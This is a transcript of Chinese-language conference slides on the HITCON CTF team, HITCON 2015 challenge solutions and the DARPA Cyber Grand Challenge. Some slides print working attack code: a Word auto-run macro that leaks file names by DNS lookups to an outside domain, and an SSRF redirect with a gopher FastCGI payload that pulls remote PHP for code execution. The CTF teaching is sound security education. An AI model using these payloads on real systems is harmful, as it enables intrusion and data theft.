Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

HITCON駭客戰隊與CTF經驗分享

1,060 views

Published on

HITCON駭客戰隊與CTF經驗分享

Published in: Internet
  • Hey guys! Who wants to chat with me? More photos with me here 👉 http://www.bit.ly/katekoxx
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

HITCON駭客戰隊與CTF經驗分享

  1. 1. HITCON 駭客戰隊與CTF經驗分享 李倫銓 HITCON CTF 領隊 & 競賽負責人
  2. 2. • HITCON CTF領隊與競賽負責人 • 交大資工所,台大電機所博士候選人, 目前任職 聯發科技 IT 部門。 • 專長:網路安全相關技術、惡意程式 與流量分析、雲端服務規劃與研究。 2016/8/25 Cloudsec 2016 2
  3. 3. outlines 2016/8/25 Cloudsec 2016 3 • HITCON CTF 戰隊、競賽介紹、題目分析 • 2016 挑戰美國CGC天網機器人探討自動攻防技 術發展(Autonomous Hacking and Patching)
  4. 4. 2016/8/25 4 HITCON Pacific
  5. 5. 2016/8/25 Cloudsec 2016 5 • HITCON CTF 戰隊、競賽介紹、題目分析 • 2016 挑戰美國CGC天網機器人探討自動攻防技 術發展(Autonomous Hacking and Patching)
  6. 6. HITCON CTF 駭客戰隊 2014年首度打入 DEFCON CTF 獲得亞軍
  7. 7. 2016/8/25 Cloudsec 2016 7 • 連續兩年DEFCON CTF種子賽,全球超過3,000人次參與 • 線上初賽共計有來自80 餘國1,024 支隊伍,超過3,000 人次參與; 實體決賽來自11 國家13 支隊伍匯聚台灣。 HITCON CTF 國際競賽
  8. 8. 2016/8/25 Cloudsec 2016 8 2016年 概念: 核反應爐 2015年 概念: 星際大戰光劍 決賽結合物聯網聲光效果 • 未受攻擊時,呈現呼吸燈效 • 被攻擊成功會狂閃紅燈 • First Blood時有隱藏版燈效
  9. 9. 2016/8/25 Cloudsec 2016 9 對不起 我只是個做家庭代工的
  10. 10. 光劍主體 • 使用台灣最知名的馬可多版光劍 • 劍刃共有六段伸縮節 • 劍把,馬可多手工打造電路板 • + 電池 + 喇叭
  11. 11. 光劍底座 底座壓克力雷切、Linkit 7688開發板、喇叭
  12. 12. 13 Specification • MT7688 • 128MB DDR2 • 32MB Flash • Chip Antenna (default) • IPEX Ext Antenna • microSD • USB Host • JTAG
  13. 13. 劍座接頭D-sub 接上去,就可以放簡報了
  14. 14. • 共地 • 電晶體放大電流
  15. 15. 設計理念 當劍在劍座上,由7688控制當劍在手上,由絕地武士控制
  16. 16. 所以就出現這種畫面了 好吃又好玩
  17. 17. 跑 openwrt
  18. 18. 步驟 • uci set network.lan.ipaddr= xxx • 拷貝光劍音效 • Madplay –S • 關閉dhcp • 關閉wireless • opkg install /root/openssh-sftp-server_6.8p1- 1_ramips_24kec.ipk
  19. 19. 透過MRAA來控制GPIO import mraa print (mraa.getVersion()) x = mraa.Gpio(13) x.dir(mraa.DIR_OUT) x.write(1)
  20. 20. • 剛剛的D1~D6 分別接到GPIO 14-19
  21. 21. 製作過程已經放上Hackday.io • Lightsaber Stand for Hackers - Making a Star Wars themed lightsaber scoreboard for 2015 HITCON CTF
  22. 22. CTF駭客競賽的型式 1 2 解題型 (Jeopardy) 對打攻防型 (Attack & Defense)
  23. 23. 解題型 ( Jeopardy ) 主辦單位出題目,參賽者 解題。 常見的題目類型 有: Reverse、 Pwnable、 Crypto、 Forensics、 Misc 於時事相關
  24. 24. HITCON 2015 - PhishingMe(Misc) • Description • Sent me a .doc, I will open it if your subject is "HITCON 2015"! • Find the flag under my file system. • p.s. I've enabled Macro for you. • Info • Point 200 • Solved by 9 (of 969 teams)
  25. 25. HITCON 2015 - PhishingMe(Misc) • 核心概念 • APT 釣魚信件 • 惡意的 Word 檔案 • Macro 巨集 • 受限的網路環境(無法外連) • 使用 DNS Tunnel 將敏感文件外傳 • 真實事件改編
  26. 26. HITCON 2015 - PhishingMe(Misc) http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
  27. 27. HITCON 2015 - PhishingMe(Misc) http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
  28. 28. HITCON 2015 - PhishingMe(Misc) http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html Sub AutoOpen() Dim objHttp: Set objHttp = CreateObject("Microsoft.XMLHTTP") uri = "http://X.X.X.X/poop/" objHttp.Open "GET", uri, False objHttp.send End Sub
  29. 29. HITCON 2015 - PhishingMe(Misc) http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html Sub AutoOpen() Dim objShell: Set objShell = CreateObject("WScript.Shell") objShell.Exec ("%comspec% /c nslookup tun.mydomain.com") End Sub
  30. 30. HITCON 2015 - PhishingMe(Misc) Sub AutoOpen() Dim objShell: Set objShell = CreateObject("WScript.Shell") Dim objFSO: Set objFSO = CreateObject("Scripting.FileSystemObject") Dim objFolder: Set objFolder = objFSO.GetFolder(".") objShell.Exec ("%comspec% /c nslookup " & objFolder.Path & ".tun.mydomain.com") Set colFiles = objFolder.Files buff = "" For Each objFile In colFiles buff = Replace(objFile.Name, " ", "_") buff = Replace(buff, ".", "_") objShell.Exec ("%comspec% /c nslookup " & buff & ".tun.mydomain.com") Next End Sub
  31. 31. HITCON 2015 - PhishingMe(Misc) • Write-Ups • https://github.com/pwning/public- writeup/blob/master/hitcon2015/misc200- phishingme/writeup.md • http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon- phishingme.html
  32. 32. HITCON 2015 - Lalala(Web) • Description • get the shell! • http://54.65.226.23 • Info • Point 400 • Solved by 2 (of 969 teams) • 網站功能 • 使用者上傳圖片 • 提供 URL 網站幫你下載圖片
  33. 33. 2016/8/25 Cloudsec 2016 35
  34. 34. HITCON 2015 - Lalala(Web) • 核心概念 • 黑箱找出 SSRF • 使用 302 跳轉繞過 SSRF 限制。 • 使用 file:// 協議進行任意讀檔,另像是用dict取得libcurl, 用sftp取得libssh版本 Server的語言在建立socket的時候大多與遠端資源互動取得banner(ascii明碼) • 發現 Nginx 使用 Fast CGI 協議 • 使用 gopher:// 協議偽造 Fast CGI 協議執行惡意 PHP 代碼 <?php header("Location: sftpt://orange.tw:12345/"); 由該主機發出的ssh版本資訊
  35. 35. HITCON 2015 - Lalala(Web) • 下載圖片檢查 $url = $_POST['url']; $filename = $_SERVER['REMOTE_ADDR'] . '.jpg'; $allowed_ext = array('jpg', 'gif', 'png', 'jpeg'); if ( !in_array(pathinfo($url)['extension'], $allowed_ext) ){ alert( 'ext not allow' ); } if ( substr($url, 0, 7) != 'http://' ){ alert( 'protocol error' ); } if ( stristr($url, '.php') != False ){ alert( 'what do you do?' ); } if ( stristr($url, 'file://') != False ){
  36. 36. HITCON 2015 - Lalala(Web) • 繞過檢查 • 使用 302 • ?url=http://orange.tw/a.php?z=a.jpg <?php header("Location: file://localhost/etc/passwd");
  37. 37. HITCON 2015 - Lalala(Web) • 讀取 /etc/nginx/sites-enabled/default 發現使用 Fast CGI • 偽造 Fast CGI Protocol 達成 RCE • Location: gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00%00%00%01%04i%1 3%00%8B%00%00%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/_www/index.php%0F%16PH P_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D% 20http%3A//orange.tw/x%01%04i%13%00%00%00%00%01%05i%13%00%00%00%00 (使用 PHP_ADMIN_VALUE 把 allow_url_include 設成 on 以及新增 auto_prepend_file 到自己的網站)
  38. 38. HITCON 2015 - Lalala(Web) • Writeups • https://docs.google.com/document/d/1eALKwCyogM5Mw_D4qW e48X-PAGZw_2vT82aP0EPIr-8/mobilebasic?pli=1
  39. 39. HITCON 2015 - Readable(Pwn) • Description • Can you read everything ? • nc 52.68.53.28 56746 • 檔案: readable-9e377f8e1e38c27672768310188a8b99 • Info • Point 300 • Solved by 8 (of 969 teams)
  40. 40. HITCON 2015 - Readable(Pwn) • 核心概念 • 程式碼很短,只有兩行 • 64bits, NX / ASLR 開啟 • Libc 未知 • Buffer Overflow 但是只有 16 Bytes • 太短無法 ROP • 沒有 leak 無法跳 One-Gadget (不知道libc的位置 int main(int argc, char *argv[]) { char buf[16]; return read(0, buf, 32); }
  41. 41. HITCON 2015 - Readable(Pwn) • ROP 太短怎麼辦? • 透過 Stack Migration 把 Stack 搬到 BSS 上 • 重複跳 read 16 將 ROP Chain 放到 BSS 上 • 沒有 puts printf 等函數無法 leak 怎麼辦? • 不要 leak 直接跳 execve • Binary 要做 ROP 沒有 syscall 指令怎麼辦? • 透過覆蓋 read 位置最後 1 byte 跳到 syacall 指令 • (因為 read 函數很短,所以 GOT 中 read 地址附近一定有 syscall)
  42. 42. HITCON 2015 - Readable(Pwn) • Writeups • https://github.com/pwning/public- writeup/blob/master/hitcon2015/pwn300-readable/writeup.md
  43. 43. Attack & Defense 零和賽制 每回合 5min A 攻擊成功 得分+10 扣分 -10 B
  44. 44. Attack & Defense 賽制說明 1 每個隊伍獲得一個 有漏洞服務的主機 2 3 4 分析主機上的漏洞 找到漏洞利用的方式 將漏洞寫成攻擊程序 並攻擊其他隊伍 透過攻擊 獲取主機上的 Flag 將 Flag 提交給大會 得分 💀 Service 💀 Service 💀 Service
  45. 45. A 0day漏洞很可怕 B C D E 😆 無法防禦 無法防禦 無法防禦 無法防禦 😣 😣 😣 😣 得分+40 扣分 -10 扣分 -10 扣分 -10 扣分 -10 攻 擊 成 功
  46. 46. 不但會新增題目,還會變化 💀 Service 💀 Service 💀 Service 時間到 出現新漏洞! 舊漏洞沒了! 💀 主辦單位會隨時間更新服 務,反應真實世界服務的 變化性,讓比賽更刺激
  47. 47. 關閉服務會被扣分 每回合 5min A 攻擊失敗 扣掉所有得分 C B Service Unavailable 均分給每個隊伍
  48. 48. 隊中成員必須各司其職 漏洞分析 修補服務漏洞 撰寫自動攻擊程式
  49. 49. CTF比賽 真實世界 參賽隊伍需要具備分析 漏洞、修補漏洞、撰寫 exploit、熟悉各類 IT 技術、通訊協定與工具, 比賽所公布的題目相當 於縮小版的商用軟體或 線上服務 商用軟體或線上服務的 使用者熟悉各種IT技術、 通訊協定與工具
  50. 50. CTF比賽 真實世界 最早挖到 0day 隊伍, 得以橫掃全場搶分,隨 著每回合時間過去,有 隊伍寫出修補程式後, 得分率下降 0day 出現時還沒有任 何修補程式,造成的危 害最大
  51. 51. CTF比賽 真實世界 避免有隊伍怕服務遭攻 擊而刻意關閉,每回合 會檢查服務狀況,若關 閉則會將分數平分給服 務存活的隊伍 服務狀態必須持續在 online,不能因為有任 何攻擊就關閉服務
  52. 52. CTF比賽 真實世界 主辦單位會不定期更新 服務版本,因此會出現 新的漏洞 服務軟體經常會更新版 本,可能會出現新的資 安問題
  53. 53. First Blood動畫!! 第一個找出漏洞並成功發動攻擊取分的隊伍
  54. 54. 2016/8/25 Cloudsec 2016 56 • HITCON CTF 戰隊、競賽介紹、題目分析 • 2016 挑戰美國CGC天網機器人探討自動攻防技 術發展(Autonomous Hacking and Patching)
  55. 55. 這部分是講去年八月在DEFCON的兩個比賽 1. DARPA 辦的 CGC (第一次辦) 2. LegitBS 辦的 DEFCON CTF 2016 2016/8/25 Cloudsec 2016 57
  56. 56. DARPA CGC (Cyber Grand Challenge) 2013-2016 2016/8/25 Cloudsec 2016 58
  57. 57. DARPA 這個 CGC 企劃究竟是什麼? CGC (Cyber Grand Challenge) 歷史上第一次完全由電腦互打的競賽,完全沒有人類參與 2016/8/25 Cloudsec 2016 59
  58. 58. • 2003年1月25日,SQL Slammer 蠕蟲短短10分鐘內, 感染七萬多台主機。 • 2010 MS LNK漏洞MS10-045,微軟Patch一次還不夠, 2015年又被挖出沒修好。 2016/8/25 Cloudsec 2016 60
  59. 59. NSS 這張圖顯示了當exploit 出現時,大部分的IPS無法偵測 來源: DARPA2016/8/25 Cloudsec 2016 61
  60. 60. FireEYE 2014年這張圖顯示,大量惡意程式生成期越來越短 來源: DARPA 2016/8/25 Cloudsec 2016 62
  61. 61. DARPA 認為光靠人類是不夠的,只有靠電腦的 秒級的速度和有系統的判斷,才能控制威脅。 2016/8/25 Cloudsec 2016 63
  62. 62. 我知道你心裡會想到這個 天網要來毀滅人類了 2016/8/25 Cloudsec 2016 64
  63. 63. 當然 ~ DARPA 也想到了… 2016/8/25 Cloudsec 2016 65 2015 CTF 比賽結束的時候,主辦單位對我們說: “2016 的CTF ,來自全世界的駭客隊伍將 一起對抗來自 DARPA 的自動攻擊機器人!”
  64. 64. + = 最強人類駭客大賽 DEFCON CTF CGC機器人冠軍 參在一起做成… 然後就 …. 搞死我們了 2016/8/25 Cloudsec 2016 66
  65. 65. 人類 人類 人類 人類 機器冠軍 DEFCON CTF 2016 的概念 就是一個機器人邀請人類去 他家打牌的概念。用的是他 的牌、牌桌也是他的。 CGC賽制 2016/8/25 Cloudsec 2016 67
  66. 66. CGC 背景介紹 2016/8/25 Cloudsec 2016 68
  67. 67. DECREE 環境 - 2016/8/25 Cloudsec 2016 69 因為真實世界作業系統發展至今,太 過複雜而且已經有各種保護機制,但 DARPA給了一個簡單的起點 • DECREE上面的程式漏洞沒辦 法用在真實世界的作業系統, 真實世界的程式漏洞沒辦法 用在DECREE裡面 • DECREE是 Opensource 單純性 限制性
  68. 68. Text vs Code of trivial program 來源: DARPA2016/8/25 Cloudsec 2016 70
  69. 69. Graph of trivial program 既有 OS 環境太複 雜,導致分析分 支太大無法運算 來源: DARPA 2016/8/25 Cloudsec 2016 71
  70. 70. Cyber Reasoning System (CRS) 每個隊伍要做出一台 CRS(Cyber reasoning System) 網路推理決策系統,來搶 第一名 200萬美金 這個CRS要做到 • 找出軟體漏洞 • 修補軟體問題 (PCB) • 分析攻擊 • 設定防火牆 • 製作攻擊( POV) • Intel Xeon 1280 cores • 16 TB Ram • 128 TB storage 2016/8/25 Cloudsec 2016 72
  71. 71. CGC 預賽與決賽 2016/8/25 Cloudsec 2016 73
  72. 72. David Brumley, CMU - CTF (PPP) CTF (shellphish) 前天opensource Dawn Song, Berkeley 師 徒 對 決 喬治亞理工 2016/8/25 Cloudsec 2016 74
  73. 73. Forallsecure MAYHEM Techx XANDRA SHELLPHISH Mechnical phish 1 2 32016/8/25 Cloudsec 2016 75
  74. 74. 全場動畫呈現 CRS 分析、攻擊、與存活 2016/8/25 Cloudsec 2016 76
  75. 75. CRS 對程式的分析過程可以透過trace呈現出來 2016/8/25 Cloudsec 2016 77
  76. 76. 剛剛噴的流量,裡面其實是參雜著存活檢測(Polls) +各隊攻擊封包(POV) 2016/8/25 Cloudsec 2016 78
  77. 77. 每一個CB都需要通過數個Poll檢查 服務被打爆就裸出來 齒輪代表 修補中 2016/8/25 Cloudsec 2016 79
  78. 78. Availability Security Evaluation 除了會用不同方法檢查是否符合功 能完整性,還會看time, memory usage, and space efficiency,大概共 有10-30個檢查 例: 12/25 0~1 1 or 2 1~2 X X 服務有沒有被打下來 1 or 2 攻擊可以成功打幾隊? 例:4/6 (打下四隊) Scoring 評分系統有三大指標 X 1002016/8/25 Cloudsec 2016 80
  79. 79. 2016/8/25 Cloudsec 2016 81
  80. 80. 來源: DARPA2016/8/25 Cloudsec 2016 82
  81. 81. 原 Attack defense 賽制 CGC 賽制 題目量 一場約6個services,外加改版 CGC共高達8x個Challenge Binaries 而這次CTF則有8個 CB 題目難度 涵蓋X86、ARM等等真實生活的 程式縮小版 DECREE版本(7 syscalls)的Binary模擬一 般常見服務漏洞撰寫方式 攻擊流量 提供隊伍下載攻擊流量 提供隊伍下載攻擊流量,但不是一般 網路流量,反倒是像input/output值 發動攻擊方 式 隊伍寫出exploit直接打對方隊伍 繳交所謂POV給裁判來統一驗證 POV 有tyep1 type2兩種 存活檢查 由主辦方直接檢測隊伍的 services 繳交PCB(patched Challenge Binary)給 裁判來統一驗證 修補 不給root只能做binary patch 做出PCB繳交給裁判驗證,但是提交 PCB下一回合將會0分,應該是不讓你 自動亂修補 其他 不給root不能設防火牆 可以繳交防火牆規則,用類似regular expression來阻擋 2016/8/25 Cloudsec 2016 83
  82. 82. 要自動化前,讓我們先了解人類如何找 漏洞、修復漏洞、寫出exploit 2016/8/25 Cloudsec 2016 84
  83. 83. 人類分析binary已經有很多好工具了 2016/8/25 Cloudsec 2016 85
  84. 84. 2016/8/25 Cloudsec 2016 86
  85. 85. 2016/8/25 Cloudsec 2016 87
  86. 86. 再來看,機器如何自動化? • 如何 Crash binary ? • 動態分析 / Fuzzing • Symbolic Execution • 如何自動 Patch? Generic patch? • 如何自動分析 Network 封包並 Replay? 2016/8/25 Cloudsec 2016 88
  87. 87. 如何自動 Patch? Generic patch? But!! 可能程式中有很多這種區塊, 大量的對不確定記憶體存取加上 檢查,會有效能問題。 而CGC的poll檢查就包括了執行效 能!! 來源: forallsecure 假設ecx指向下一個寫入的位置,並在這程式存在out-of- bound read/write, 那我們可以插入一段程式去做檢查 來patch掉這個漏洞 2016/8/25 Cloudsec 2016 89
  88. 88. 來源: DARPA2016/8/25 Cloudsec 2016 90
  89. 89. CRS 設計 – 以ShellPhish 為例 來源:shellphish http://angr.io 2016/8/25 Cloudsec 2016 91
  90. 90. 人類 VS 機器 - 獲勝的關鍵 – Binary 複雜度 • 人類 • 優勢: • 人類擅長分析以前沒出現 過的pattern • 可以適應主辦程式寫錯 • 劣勢: • 要睡覺 • 錢給少,心就委屈,然後 就會犯錯 2016/8/25 Cloudsec 2016 92 •機器 • 優勢 • 能處理大量題目 • 速度快、能升級 • 劣勢 • 目前難以處理較為複雜的題目 • 沒辦法適應環境變化或錯誤 • 李師父,攻他電路
  91. 91. 辦 CGC 比賽還有一個關鍵,就是 DATA SET(題目) 的完整性 CGC Binary是否足以代表目前幾個重要的漏洞問題? Buffer overflow? Stack overflow ? Heap overflow? Memory leakage?2016/8/25 Cloudsec 2016 93
  92. 92. Finalists POV 2016/8/25 Cloudsec 2016 94來源: DARPA 題目
  93. 93. Finalists – POV on bottom, avail on Top 2016/8/25 Cloudsec 2016 95來源: DARPA 題目
  94. 94. Finalists – CWE-120 Buffer Overflow 2016/8/25 Cloudsec 2016 96來源: DARPABO分布
  95. 95. Finalists – CWE-121 Stack Overflow 2016/8/25 Cloudsec 2016 97來源: DARPA
  96. 96. Finalists – CWE-122 Heap Overflow 2016/8/25 Cloudsec 2016 98來源: DARPA
  97. 97. Finalists – CWE-125 Out of Bounds Read 2016/8/25 Cloudsec 2016 99來源: DARPA
  98. 98. Finalists – CWE-787 Out of Bounds Write 2016/8/25 Cloudsec 2016 100來源: DARPA
  99. 99. Finalists – CWE-476 Null point Deref 2016/8/25 Cloudsec 2016 101 根據各隊解題狀況 的數據顯示,機器 非常擅長處理這類 漏洞 來源: DARPA
  100. 100. 整場 CTF 賽事感想 1. 0day 不值錢,天才都哭了,你會replay就有機會 2. CTF主辦單位題目難度無法提高,因為竟然要考慮 到機器的心情 • 美國大駭客 Geohot、韓國天才 Loki 無法發揮人類最 高智商,loki 打完生氣到跑回飯店。 3. 難度沒提高也就算了,D1 , D2機器人線還沒接好 所以沒發揮機器人優勢 • 也不知道還能不能看到下次機器人發揮的機會 2016/8/25 Cloudsec 2016 102
  101. 101. 2002-2016年 DEFCON CTF 前三名國家來看資安 人才發展 2016/8/25 Cloudsec 2016 103 2016 PPP USA b1o0p CHINA DEFKOR South Korea Taiwan Taiwan 台灣CP值 真的還不 錯,值得 繼續投資
  102. 102. 那麼回到大家關注的問題,機器人打得贏人嗎 • 其實這次比賽並不完整,因為線沒接好 • 冠軍Mayhem 斷線兩天,第二天結束還可以打贏美國兩隊 (Dragon Sector 和 Samurai ) XDDD 2016/8/25 Cloudsec 2016 104 第一天抱怨API 第二天抱怨流量沒進來
  103. 103. 然後~~~~ CTF 最後一天接上完整流量 • Mayhem 竟然 9 個 binary 它找到 7 個 exploit,6 個上 patch。 2016/8/25 Cloudsec 2016 105 秘辛#1 : 機器人冠軍Mayhem在 打 CGC 聽說打了一半就當機,最 後還拿CGC冠軍。 八卦是-> 前面的binary聽說比較簡單
  104. 104. 秘辛#2 : • PPP的 Patch 留有後門。賽制中你可以拿其他隊的patch自己用, 所以全場很自然的會去抓第一名隊伍(which is PPP)的patch來 用,結果安裝他的patch之後全場都被他打,這招打得全場呱呱 叫。據說~~ Mayhem機器人也有這個功能 2016/8/25 Cloudsec 2016 106
  105. 105. Conclusion • DARPA 已經release CGC相關資源,包括初賽題目、計分狀況、比賽規則、 DECREE github 相關code、決賽題目等等。 • 第三名CGC隊伍 Shellphish 前天公開他們的機器人原始碼 • 自動化攻防究竟會不會打敗人類? 電腦會不會統治世界? • DARPA的成功在於, • 找到一個好理由,讓大家投入自動化挖洞研究 • 設計一個好賽制,讓大家自己拼命去爭取那200萬美金 • 拉DEFCON CTF下水,讓機器人當一隊,還說是全人類要挑戰電腦,創造議 題 • CGC企劃,成功把產業趨勢、學術研究上最難的dataset驗證、CTF 大賽串起來,造成相當的話題,便是給予資安環境相當高的貢獻 • 簡單/固定樣式的洞 -> 交給機器人 。複雜/創新的洞 -> 交給人類 2016/8/25 Cloudsec 2016 107
  106. 106. Script kiddies 以前 已知漏洞 Metasploit 未來 Script kiddies 未知漏洞 Mayham Take Control ?? 小孩也行 2016/8/25 Cloudsec 2016 108
  107. 107. Q/A ? alan@hitcon.org 2016/8/25 Cloudsec 2016 109

×